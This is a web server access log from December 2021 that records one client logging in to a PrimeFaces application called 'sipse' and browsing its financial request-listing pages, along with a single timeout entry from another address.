186.31.49.253 - - [26/Dec/2021:18:17:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:36 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:36 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:36 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:36 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:37 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:37 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:38 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:38 -0500] "GET /sipse/faces/faces/index.xhtml HTTP/1.1" 200 677
186.31.49.253 - - [26/Dec/2021:18:17:38 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:38 -0500] "GET /sipse/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12175
186.31.49.253 - - [26/Dec/2021:18:17:39 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:39 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:39 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:39 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:39 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:39 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:39 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:39 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:45 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2220
186.31.49.253 - - [26/Dec/2021:18:17:45 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:52 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:53 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16377
186.31.49.253 - - [26/Dec/2021:18:17:53 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:53 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:53 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:53 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:53 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.31.49.253 - - [26/Dec/2021:18:17:53 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:56 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
186.31.49.253 - - [26/Dec/2021:18:17:56 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:57 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 61603
186.31.49.253 - - [26/Dec/2021:18:17:58 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:58 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:58 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:59 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:59 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:17:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1448
66.249.75.113 - - [26/Dec/2021:18:18:03 -0500] "-" 408 -
186.31.49.253 - - [26/Dec/2021:18:18:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 34630
186.31.49.253 - - [26/Dec/2021:18:18:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 34666
186.31.49.253 - - [26/Dec/2021:18:18:08 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 35136
186.31.49.253 - - [26/Dec/2021:18:18:10 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 9386
186.31.49.253 - - [26/Dec/2021:18:18:14 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 35132
186.31.49.253 - - [26/Dec/2021:18:18:15 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 15050
186.31.49.253 - - [26/Dec/2021:18:18:15 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 15010
186.31.49.253 - - [26/Dec/2021:18:18:16 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 15046
186.31.49.253 - - [26/Dec/2021:18:18:26 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 131541
186.31.49.253 - - [26/Dec/2021:18:18:27 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.31.49.253 - - [26/Dec/2021:18:18:27 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
